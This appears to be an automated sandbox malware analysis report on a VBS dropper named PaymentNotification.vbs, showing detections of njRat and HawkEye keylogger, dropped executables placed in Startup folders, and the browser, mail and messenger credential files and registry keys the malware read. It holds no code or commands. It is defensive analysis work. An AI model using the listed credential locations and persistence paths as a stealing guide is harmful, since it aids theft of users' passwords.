Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5824, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4040020.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4040020.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEyeKeylogger
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: kr'&HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: kr#"HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

Detected njRat

Show sources

Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs	.Net Code: njRat config detected
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs	.Net Code: njRat config detected

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0A8E listen,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0FC6 bind,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0A50 listen,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0F93 bind,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation21	Startup Items1	Startup Items1	Disable or Modify Tools21	OS Credential Dumping1	Peripheral Device Discovery1	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting121	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture11	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API11	Scheduled Task/Job1	Access Token Manipulation1	Scripting121	Credentials in Registry2	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Shared Modules1	Registry Run Keys / Startup Folder12	Process Injection512	Obfuscated Files or Information141	Credentials In Files1	System Information Discovery17	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Remote Access Software2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Exploitation for Client Execution1	Network Logon Script	Scheduled Task/Job1	Software Packing21	LSA Secrets	Query Registry1	SSH	Clipboard Data1	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Scheduled Task/Job1	Rc.common	Registry Run Keys / Startup Folder12	Masquerading1	Cached Domain Credentials	Security Software Discovery241	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol113	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion41	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Virtualization/Sandbox Evasion41	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection512	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	System Network Configuration Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PaymentNotification.vbs	12%	Virustotal		Browse
PaymentNotification.vbs	17%	ReversingLabs	Script-WScript.Dropper.SDrop

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Tmp.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\pgr.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\servieda.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	100%	Avira	TR/AD.MExecute.lzrac
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	100%	Avira	SPR/Tool.MailPassView.473
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\pgr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\servieda.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Tmp.exe	78%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Tmp.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Local\Temp\pgr.exe	91%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\pgr.exe	91%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	91%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	91%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\servieda.exe	78%	Metadefender		Browse
C:\Users\user\AppData\Roaming\servieda.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	100%	Avira	HEUR/AGEN.1108374	Download File
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
